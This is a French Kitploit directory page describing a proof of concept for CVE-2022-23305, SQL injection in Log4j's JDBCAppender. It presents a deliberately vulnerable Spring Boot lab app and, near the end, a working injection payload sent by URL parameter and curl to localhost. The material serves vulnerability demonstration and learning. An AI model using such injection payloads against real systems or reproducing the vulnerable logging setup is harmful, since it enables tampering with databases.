Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-23305_POC — CVE-2022-23305 POC d'injection SQL JDBCAppender Log4J | Kitploit
Outils/GitHubGitHub/tkomlodi/cve-2022-23305_poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationSécurité des Bases de DonnéesLabs et Pratique
GitHubtkomlodi/cve-2022-23305_poc

CVE-2022-23305_POC

CVE-2022-23305 POC d'injection SQL JDBCAppender Log4J

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-23305 Log4j JDBCAppender sql injection POC

Il s'agit d'une application très simple basée sur Spring Boot qui démontre la vulnérabilité CVE-2022-23305. Elle utilise Apache Maven, Spring Boot, Spring MVC et la base de données en mémoire H2 pour journaliser une simple entrée, prise comme paramètre de chaîne de requête URL. Étant donné que Log4J est configuré pour utiliser un JDBCAppender, elle est vulnérable à l'injection SQL.

Voir src/main/java/poc/InjectionController.java pour l'instruction de journalisation.
Voir le dossier src/main/resource pour tous les fichiers de configuration.

Vous pouvez exécuter l'application avec Java et Maven en lançant mvn clean spring-boot:run.
Vous pouvez également l'exécuter en tant qu'application Docker, par exemple :
 docker build --tag log4j-poc .
 docker run -p 8080:8080 log4j-poc

L'application sera disponible à l'adresse http://localhost:8080/.
Pour exploiter la vulnérabilité, soumettez une instruction SQL injectée comme paramètre qui est journalisé :
 "http://localhost:8080/?param=');insert into logs values(':("
La réponse listera les entrées de journal ajoutées, dont une ajoutée par le SQL injecté dans le paramètre.
Pour faire de même avec curl, utilisez :
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('

Télécharger l’outil